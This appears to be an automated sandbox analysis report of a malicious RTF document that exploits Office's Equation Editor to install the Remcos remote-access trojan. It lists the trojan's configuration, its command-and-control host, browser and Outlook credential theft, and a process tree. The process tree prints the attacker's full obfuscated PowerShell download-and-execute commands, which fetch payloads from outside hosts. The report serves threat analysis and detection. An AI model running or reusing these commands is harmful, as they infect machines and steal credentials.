Analysis
-
max time kernel
149s -
max time network
149s -
platform
windows7_x64 -
resource
win7-20241023-en -
resource tags
arch:x64arch:x86image:win7-20241023-enlocale:en-usos:windows7-x64system -
submitted
23-01-2025 16:06
Static task
static1
Behavioral task
behavioral1
Sample
sheisveryinterestingirlsheisverybestfirlformebestthingsshedoing_____undergoodthingsarehappeningevnte.rtf
Resource
win7-20241023-en
Behavioral task
behavioral2
Sample
sheisveryinterestingirlsheisverybestfirlformebestthingsshedoing_____undergoodthingsarehappeningevnte.rtf
Resource
win10v2004-20241007-en
General
-
Target
sheisveryinterestingirlsheisverybestfirlformebestthingsshedoing_____undergoodthingsarehappeningevnte.rtf
-
Size
243KB
-
MD5
8e128f75977895f5e8767935ab792e5d
-
SHA1
6820bb80d79a418adecf1db8d7bf1fddf054fc4e
-
SHA256
2b95f8d7e77d68b4fc2f40b1c42a9da731bd9812a60c36162019063f8af24978
-
SHA512
d579f38026e4c10b500dabea06f1965b4446ddd0a67b01f51a813b5963173af876e557c0dffe00c667be50a47fd02635062f3924fadd08f5455787c4e5651a3f
-
SSDEEP
3072:GBU+1XqRJXufoJVSCOum9tkU5/YATIiQvyUS:tdJXuQJwn5gDiQvyUS
Malware Config
Extracted
remcos
RemoteHost
abeangana.duckdns.org:1121
-
audio_folder
MicRecords
-
audio_path
ApplicationPath
-
audio_record_time
5
-
connect_delay
0
-
connect_interval
1
-
copy_file
remcos.exe
-
copy_folder
Remcos
-
delete_file
false
-
hide_file
false
-
hide_keylog_file
false
-
install_flag
false
-
keylog_crypt
false
-
keylog_file
logs.dat
-
keylog_flag
false
-
keylog_folder
remcos
-
mouse_option
false
-
mutex
Rmc-B9B8CE
-
screenshot_crypt
false
-
screenshot_flag
false
-
screenshot_folder
Screenshots
-
screenshot_path
%AppData%
-
screenshot_time
10
-
take_screenshot_option
false
-
take_screenshot_time
5
Signatures
-
Remcos family
-
Detected Nirsoft tools 3 IoCs
Free utilities often used by attackers which can steal passwords, product keys, etc.
resource yara_rule behavioral1/memory/2700-249-0x0000000000400000-0x0000000000424000-memory.dmp Nirsoft behavioral1/memory/2680-248-0x0000000000400000-0x0000000000478000-memory.dmp Nirsoft behavioral1/memory/2328-247-0x0000000000400000-0x0000000000462000-memory.dmp Nirsoft -
NirSoft MailPassView 1 IoCs
Password recovery tool for various email clients
resource yara_rule behavioral1/memory/2328-247-0x0000000000400000-0x0000000000462000-memory.dmp MailPassView -
NirSoft WebBrowserPassView 1 IoCs
Password recovery tool for various web browsers
resource yara_rule behavioral1/memory/2680-248-0x0000000000400000-0x0000000000478000-memory.dmp WebBrowserPassView -
Blocklisted process makes network request 12 IoCs
flow pid Process 5 2604 EQNEDT32.EXE 7 2604 EQNEDT32.EXE 9 2604 EQNEDT32.EXE 11 2604 EQNEDT32.EXE 13 2604 EQNEDT32.EXE 15 2604 EQNEDT32.EXE 17 2604 EQNEDT32.EXE 18 2604 EQNEDT32.EXE 20 1096 powershell.exe 22 2372 powershell.exe 23 2372 powershell.exe 24 2372 powershell.exe -
Evasion via Device Credential Deployment 1 IoCs
pid Process 1096 powershell.exe -
Accesses Microsoft Outlook accounts 1 TTPs 1 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts CasPol.exe -
pid Process 2372 powershell.exe -
Drops file in System32 directory 1 IoCs
description ioc Process File opened for modification C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe -
Suspicious use of SetThreadContext 4 IoCs
description pid Process procid_target PID 2372 set thread context of 2740 2372 powershell.exe 45 PID 2740 set thread context of 2680 2740 CasPol.exe 47 PID 2740 set thread context of 2328 2740 CasPol.exe 49 PID 2740 set thread context of 2700 2740 CasPol.exe 50 -
Detected phishing page
-
Drops file in Windows directory 1 IoCs
description ioc Process File opened for modification C:\Windows\Debug\WIA\wiatrace.log WINWORD.EXE -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 13 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language WScript.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language CasPol.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language CasPol.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language WINWORD.EXE Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language mshta.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language csc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cvtres.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language EQNEDT32.EXE Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language CasPol.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language CasPol.exe -
Office loads VBA resources, possible macro or embedded object present
-
Launches Equation Editor 1 TTPs 1 IoCs
Equation Editor is an old Office component often targeted by exploits such as CVE-2017-11882.
pid Process 2604 EQNEDT32.EXE -
description ioc Process Key created \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\Internet Explorer\Main mshta.exe -
Suspicious behavior: AddClipboardFormatListener 1 IoCs
pid Process 2380 WINWORD.EXE -
Suspicious behavior: EnumeratesProcesses 6 IoCs
pid Process 1096 powershell.exe 2372 powershell.exe 2372 powershell.exe 2372 powershell.exe 2680 CasPol.exe 2680 CasPol.exe -
Suspicious behavior: MapViewOfSection 4 IoCs
pid Process 2740 CasPol.exe 2740 CasPol.exe 2740 CasPol.exe 2740 CasPol.exe -
Suspicious use of AdjustPrivilegeToken 3 IoCs
description pid Process Token: SeDebugPrivilege 1096 powershell.exe Token: SeDebugPrivilege 2372 powershell.exe Token: SeDebugPrivilege 2700 CasPol.exe -
Suspicious use of SetWindowsHookEx 2 IoCs
pid Process 2380 WINWORD.EXE 2380 WINWORD.EXE -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 2604 wrote to memory of 2952 2604 EQNEDT32.EXE 33 PID 2604 wrote to memory of 2952 2604 EQNEDT32.EXE 33 PID 2604 wrote to memory of 2952 2604 EQNEDT32.EXE 33 PID 2604 wrote to memory of 2952 2604 EQNEDT32.EXE 33 PID 2952 wrote to memory of 2124 2952 mshta.exe 35 PID 2952 wrote to memory of 2124 2952 mshta.exe 35 PID 2952 wrote to memory of 2124 2952 mshta.exe 35 PID 2952 wrote to memory of 2124 2952 mshta.exe 35 PID 2124 wrote to memory of 1096 2124 cmd.exe 37 PID 2124 wrote to memory of 1096 2124 cmd.exe 37 PID 2124 wrote to memory of 1096 2124 cmd.exe 37 PID 2124 wrote to memory of 1096 2124 cmd.exe 37 PID 1096 wrote to memory of 2180 1096 powershell.exe 38 PID 1096 wrote to memory of 2180 1096 powershell.exe 38 PID 1096 wrote to memory of 2180 1096 powershell.exe 38 PID 1096 wrote to memory of 2180 1096 powershell.exe 38 PID 2180 wrote to memory of 1364 2180 csc.exe 39 PID 2180 wrote to memory of 1364 2180 csc.exe 39 PID 2180 wrote to memory of 1364 2180 csc.exe 39 PID 2180 wrote to memory of 1364 2180 csc.exe 39 PID 1096 wrote to memory of 1368 1096 powershell.exe 41 PID 1096 wrote to memory of 1368 1096 powershell.exe 41 PID 1096 wrote to memory of 1368 1096 powershell.exe 41 PID 1096 wrote to memory of 1368 1096 powershell.exe 41 PID 1368 wrote to memory of 2372 1368 WScript.exe 42 PID 1368 wrote to memory of 2372 1368 WScript.exe 42 PID 1368 wrote to memory of 2372 1368 WScript.exe 42 PID 1368 wrote to memory of 2372 1368 WScript.exe 42 PID 2372 wrote to memory of 592 2372 powershell.exe 44 PID 2372 wrote to memory of 592 2372 powershell.exe 44 PID 2372 wrote to memory of 592 2372 powershell.exe 44 PID 2372 wrote to memory of 592 2372 powershell.exe 44 PID 2372 wrote to memory of 2740 2372 powershell.exe 45 PID 2372 wrote to memory of 2740 2372 powershell.exe 45 PID 2372 wrote to memory of 2740 2372 powershell.exe 45 PID 2372 wrote to memory of 2740 2372 powershell.exe 45 PID 2372 wrote to memory of 2740 2372 powershell.exe 45 PID 2372 wrote to memory of 2740 2372 powershell.exe 45 PID 2372 wrote to memory of 2740 2372 powershell.exe 45 PID 2372 wrote to memory of 2740 2372 powershell.exe 45 PID 2372 wrote to memory of 2740 2372 powershell.exe 45 PID 2372 wrote to memory of 2740 2372 powershell.exe 45 PID 2372 wrote to memory of 2740 2372 powershell.exe 45 PID 2380 wrote to memory of 2336 2380 WINWORD.EXE 46 PID 2380 wrote to memory of 2336 2380 WINWORD.EXE 46 PID 2380 wrote to memory of 2336 2380 WINWORD.EXE 46 PID 2380 wrote to memory of 2336 2380 WINWORD.EXE 46 PID 2740 wrote to memory of 2680 2740 CasPol.exe 47 PID 2740 wrote to memory of 2680 2740 CasPol.exe 47 PID 2740 wrote to memory of 2680 2740 CasPol.exe 47 PID 2740 wrote to memory of 2680 2740 CasPol.exe 47 PID 2740 wrote to memory of 2680 2740 CasPol.exe 47 PID 2740 wrote to memory of 2492 2740 CasPol.exe 48 PID 2740 wrote to memory of 2492 2740 CasPol.exe 48 PID 2740 wrote to memory of 2492 2740 CasPol.exe 48 PID 2740 wrote to memory of 2492 2740 CasPol.exe 48 PID 2740 wrote to memory of 2328 2740 CasPol.exe 49 PID 2740 wrote to memory of 2328 2740 CasPol.exe 49 PID 2740 wrote to memory of 2328 2740 CasPol.exe 49 PID 2740 wrote to memory of 2328 2740 CasPol.exe 49 PID 2740 wrote to memory of 2328 2740 CasPol.exe 49 PID 2740 wrote to memory of 2700 2740 CasPol.exe 50 PID 2740 wrote to memory of 2700 2740 CasPol.exe 50 PID 2740 wrote to memory of 2700 2740 CasPol.exe 50
Processes
-
C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE"C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\sheisveryinterestingirlsheisverybestfirlformebestthingsshedoing_____undergoodthingsarehappeningevnte.rtf"1⤵
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2380 -
C:\Windows\splwow64.exeC:\Windows\splwow64.exe 122882⤵PID:2336
-
-
C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE"C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding1⤵
- Blocklisted process makes network request
- System Location Discovery: System Language Discovery
- Launches Equation Editor
- Suspicious use of WriteProcessMemory
PID:2604 -
C:\Windows\SysWOW64\mshta.exe"C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Roaming\ccukissmeplsgivrmebest.hta"2⤵
- System Location Discovery: System Language Discovery
- Modifies Internet Explorer settings
- Suspicious use of WriteProcessMemory
PID:2952 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" "/c PowerShELL -eX bYpass -nOp -W 1 -C dEvIceCREDeNtiALDEpLoYMeNt.eXe ; IEX($(ieX('[SysTem.TEXT.ENCOdINg]'+[CHaR]58+[CHAR]0x3a+'UTF8.gEtsTRING([sYSteM.convert]'+[ChAr]0X3a+[cHAr]58+'fROmbaSe64STRING('+[chAr]34+'JDFBeDhTWjJQTDEgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhREQtdHlwZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTWVtQkVSREVmSU5JVElvTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVXJMbU9OLkRsTCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgUGosc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFNpd0dacUh1LHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDd01TSG4sdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBkSCxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgT0NEZEVXcSk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbkFtZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiTVlUVHFEbnRtIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFNZXNQYUNlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEtRSnd1cFpDaSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICQxQXg4U1oyUEwxOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTQ1LjIzOS4yOS4xMi8yMjUvbmljZWdpcmxmcm5kZ2l2ZW5tZWJlc3R0aGluZ3Nmb3JnLmdJRiIsIiRlTlY6QVBQREFUQVxuaWNlZ2lybGZybmRnaXZlbm1lYmVzbmljZWdpcmxmcm5kZ2l2ZW5tZWJlcy52YnMiLDAsMCk7c1RBUlQtc2xFZXAoMyk7aU52b0tFLUV4cFJFc3NJb24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRFTlY6QVBQREFUQVxuaWNlZ2lybGZybmRnaXZlbm1lYmVzbmljZWdpcmxmcm5kZ2l2ZW5tZWJlcy52YnMi'+[CHAr]0X22+'))')))"3⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2124 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exePowerShELL -eX bYpass -nOp -W 1 -C dEvIceCREDeNtiALDEpLoYMeNt.eXe ; IEX($(ieX('[SysTem.TEXT.ENCOdINg]'+[CHaR]58+[CHAR]0x3a+'UTF8.gEtsTRING([sYSteM.convert]'+[ChAr]0X3a+[cHAr]58+'fROmbaSe64STRING('+[chAr]34+'JDFBeDhTWjJQTDEgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhREQtdHlwZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTWVtQkVSREVmSU5JVElvTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVXJMbU9OLkRsTCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgUGosc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFNpd0dacUh1LHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDd01TSG4sdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBkSCxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgT0NEZEVXcSk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbkFtZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiTVlUVHFEbnRtIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFNZXNQYUNlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEtRSnd1cFpDaSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICQxQXg4U1oyUEwxOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTQ1LjIzOS4yOS4xMi8yMjUvbmljZWdpcmxmcm5kZ2l2ZW5tZWJlc3R0aGluZ3Nmb3JnLmdJRiIsIiRlTlY6QVBQREFUQVxuaWNlZ2lybGZybmRnaXZlbm1lYmVzbmljZWdpcmxmcm5kZ2l2ZW5tZWJlcy52YnMiLDAsMCk7c1RBUlQtc2xFZXAoMyk7aU52b0tFLUV4cFJFc3NJb24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRFTlY6QVBQREFUQVxuaWNlZ2lybGZybmRnaXZlbm1lYmVzbmljZWdpcmxmcm5kZ2l2ZW5tZWJlcy52YnMi'+[CHAr]0X22+'))')))"4⤵
- Blocklisted process makes network request
- Evasion via Device Credential Deployment
- Drops file in System32 directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1096 -
C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe"C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\2lbocpg5.cmdline"5⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2180 -
C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exeC:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESD75C.tmp" "c:\Users\Admin\AppData\Local\Temp\CSCD75B.tmp"6⤵
- System Location Discovery: System Language Discovery
PID:1364
-
-
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\nicegirlfrndgivenmebesnicegirlfrndgivenmebes.vbs"5⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1368 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -Command "[System.Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('JABpAG0AYQBnAGUAVQByAGwAIAA9ACAAJwBoAHQAdABwAHMAOgAvAC8AcgBlAHMALgBjAGwAbwB1AGQAaQBuAGEAcgB5AC4AYwBvAG0ALwBkAGEAeAB3AHUAYQA2ADMAeQAvAGkAbQBhAGcAZQAvAHUAcABsAG8AYQBkAC8AdgAxADcAMwA3ADUANAA0ADAANgAzAC8AMQBuAGUAdwBfAGkAbQBhAGcAZQBfAG4AagBwADAAeQByAC4AagBwAGcAJwA7ACAAdAByAHkAIAB7ACAAJAB3AGUAYgBDAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ADsAIAAkAGkAbQBhAGcAZQBCAHkAdABlAHMAIAA9ACAAJAB3AGUAYgBDAGwAaQBlAG4AdAAuAEQAbwB3AG4AbABvAGEAZABEAGEAdABhACgAJABpAG0AYQBnAGUAVQByAGwAKQA7ACAAJABpAG0AYQBnAGUAVABlAHgAdAAgAD0AIABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAFQARgA4AC4ARwBlAHQAUwB0AHIAaQBuAGcAKAAkAGkAbQBhAGcAZQBCAHkAdABlAHMAKQA7ACAAJABzAHQAYQByAHQARgBsAGEAZwAgAD0AIAAnADwAPABCAEEAUwBFADYANABfAFMAVABBAFIAVAA+AD4AJwA7ACAAJABlAG4AZABGAGwAYQBnACAAPQAgACcAPAA8AEIAQQBTAEUANgA0AF8ARQBOAEQAPgA+ACcAOwAgACQAcwB0AGEAcgB0AEkAbgBkAGUAeAAgAD0AIAAkAGkAbQBhAGcAZQBUAGUAeAB0AC4ASQBuAGQAZQB4AE8AZgAoACQAcwB0AGEAcgB0AEYAbABhAGcAKQA7ACAAJABlAG4AZABJAG4AZABlAHgAIAA9ACAAJABpAG0AYQBnAGUAVABlAHgAdAAuAEkAbgBkAGUAeABPAGYAKAAkAGUAbgBkAEYAbABhAGcAKQA7ACAAaQBmACAAKAAkAHMAdABhAHIAdABJAG4AZABlAHgAIAAtAGcAZQAgADAAIAAtAGEAbgBkACAAJABlAG4AZABJAG4AZABlAHgAIAAtAGcAdAAgACQAcwB0AGEAcgB0AEkAbgBkAGUAeAApACAAewAgACQAcwB0AGEAcgB0AEkAbgBkAGUAeAAgACsAPQAgACQAcwB0AGEAcgB0AEYAbABhAGcALgBMAGUAbgBnAHQAaAA7ACAAJABiAGEAcwBlADYANABDAG8AbQBtAGEAbgBkACAAPQAgACQAaQBtAGEAZwBlAFQAZQB4AHQALgBTAHUAYgBzAHQAcgBpAG4AZwAoACQAcwB0AGEAcgB0AEkAbgBkAGUAeAAsACAAJABlAG4AZABJAG4AZABlAHgAIAAtACAAJABzAHQAYQByAHQASQBuAGQAZQB4ACkAOwAgACQAYwBvAG0AbQBhAG4AZABCAHkAdABlAHMAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACQAYgBhAHMAZQA2ADQAQwBvAG0AbQBhAG4AZAApADsAIAAkAGwAbwBhAGQAZQBkAEEAcwBzAGUAbQBiAGwAeQAgAD0AIABbAFMAeQBzAHQAZQBtAC4AUgBlAGYAbABlAGMAdABpAG8AbgAuAEEAcwBzAGUAbQBiAGwAeQBdADoAOgBMAG8AYQBkACgAJABjAG8AbQBtAGEAbgBkAEIAeQB0AGUAcwApADsAJABtAGUAdABoAG8AZAAgAD0AIABbAFIAdQBtAHAALgBDAGwAYQBzAHMAOQBdAC4ARwBlAHQATQBlAHQAaABvAGQAKAAnAHMAbQBlAHQAaABvAGQAXwAyACcAKQA7ACAAJABtAGUAdABoAG8AZAAuAEkAbgB2AG8AawBlACgAJABuAHUAbABsACwAIABbAG8AYgBqAGUAYwB0AFsAXQBdAEAAKAAnAHQAeAB0AC4AcwBnAG4AaQBoAHQAdABhAGUAcgBnAGgAdABpAHcAcwBnAG4AaQBoAHQAZABvAG8AZwB0AHMAZQBiAC8ANQAyADIALwAyADEALgA5ADIALgA5ADMAMgAuADUANAAxAC8ALwA6AHAAdAB0AGgAJwAsACcAZgBhAGwAcwBlACcALAAnAGYAYQBsAHMAZQAnACwAJwBmAGEAbABzAGUAJwAsACcAZgBhAGwAcwBlACcALAAnAGYAYQBsAHMAZQAnACwAJwBDAGEAcwBQAG8AbAAnACwAJwBmAGEAbABzAGUAJwApACkAOwAgAH0AIAB9ACAAYwBhAHQAYwBoACAAewAgAFcAcgBpAHQAZQAtAE8AdQB0AHAAdQB0ACAAJwBFAHIAcgBvADoAIAAkAF8AJwA7ACAAfQA=')) | Invoke-Expression"6⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2372 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"7⤵PID:592
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"7⤵
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious behavior: MapViewOfSection
- Suspicious use of WriteProcessMemory
PID:2740 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe /stext "C:\Users\Admin\AppData\Local\Temp\uznrrmfpnjdelmsfbwv"8⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:2680
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe /stext "C:\Users\Admin\AppData\Local\Temp\ebsjsexjbsvinthjshizgi"8⤵PID:2492
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe /stext "C:\Users\Admin\AppData\Local\Temp\ebsjsexjbsvinthjshizgi"8⤵
- Accesses Microsoft Outlook accounts
- System Location Discovery: System Language Discovery
PID:2328
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe /stext "C:\Users\Admin\AppData\Local\Temp\ovxctxikxannyzdnbrvtrnqoxd"8⤵
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:2700
-
-
-
-
-
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize342B
MD56c6e38ec3d63eacf9fac1f8b1dbe150f
SHA15f7105c76f54582afe867a631d74580da6ce4f7e
SHA256e53cc15bfc6bf7875b697d38d8b65cb7c0e3079fb34a0c5c6bb31a0f7f4f0eb4
SHA51246016088c5de99fb77e8ff9502ba3941c2c6cd6f5aff68c417a322ede6a833c440384a4f3ecd359600ff67eedf1c1abeffac6547f397a189ae2018c6b5a4326d
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize342B
MD5483cfadc07d3ec63a061a606d56bb365
SHA111f84767a06cbee6b75b100b812ec82fc9817c98
SHA2569623c40ea51329409db6344369f41bfd63d460a726d0b10ee1c6b892290042bb
SHA512e78d6929055375505e4f989edaf0f599cfbe9db842bb19121b52cb2b5cce90aec7d2187805cb25fbfc583aed59b37238df9b87b238b38df92ff5b6ed50abbf55
-
Filesize
3KB
MD5d02f490516a1ab5777d47524993768e5
SHA15edbde6966e03027116d96d6dd305e594c021ab9
SHA25609e38c63a0c1a30ae118319beec58305534c6bb1738f25ee126fc987461c4bb9
SHA512c994f42441563225baa361e59a9a5e762929dba4b7a4f8a8a8a2a0a0acd2494f1f0db6364cf5fa345b47bee1e94c3e58369cb4ad42d8712fd8895c208b194b96
-
Filesize
7KB
MD5032d976d0d429e210dc2ca3bb00b235e
SHA104cc0acdcb44b083308df7a0a5dcc623452f5e2f
SHA2566956b8ebf6e5574565f7a2ac4d65fd674854cb0bef8e1a8406242fdac4375e1a
SHA5129441651a730f8a4f5d3dd3dc90b3300e002daea09daf0f96b0d8a8b79b230f5ae0615787cad9016a873878c59ac8acbf7eb12c1a7d8295b51791e79792873a37
-
Filesize
70KB
MD549aebf8cbd62d92ac215b2923fb1b9f5
SHA11723be06719828dda65ad804298d0431f6aff976
SHA256b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f
SHA512bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b
-
Filesize
1KB
MD52e95e8a7111b3f076cf925c03e7f496f
SHA1dfb1bb319d27311ebe88081754b281a1f147afc6
SHA2569997862337ea87791b8ea2692ea106ec6075240605bc433d2b42388927be7dcd
SHA512940576e5d83768121c2fefde0109239167e2bb3d93e328e652cd01dd9c9ec20f0e8bde3c1083b09c37e8d7a1f1635dcf049de1e0668d3117a801192adca0b95d
-
Filesize
181KB
MD54ea6026cf93ec6338144661bf1202cd1
SHA1a1dec9044f750ad887935a01430bf49322fbdcb7
SHA2568efbc21559ef8b1bcf526800d8070baad42474ce7198e26fa771dbb41a76b1d8
SHA5126c7e0980e39aacf4c3689802353f464a08cd17753bd210ee997e5f2a455deb4f287a9ef74d84579dbde49bc96213cd2b8b247723919c412ea980aa6e6bfe218b
-
Filesize
2B
MD5f3b25701fe362ec84616a93a45ce9998
SHA1d62636d8caec13f04e28442a0a6fa1afeb024bbb
SHA256b3d510ef04275ca8e698e5b3cbb0ece3949ef9252f0cdc839e9ee347409a2209
SHA51298c5f56f3de340690c139e58eb7dac111979f0d4dffe9c4b24ff849510f4b6ffa9fd608c0a3de9ac3c9fd2190f0efaf715309061490f9755a9bfdf1c54ca0d84
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
Filesize7KB
MD5f523957a49c7cfb4df12f6c6151bf5a4
SHA1470d00276de3a601747f6f752fb90308bccb25f2
SHA2567515666c0c694a716eaa85a36269a7af69b4ce06d627a2393bff4e9386cd94c7
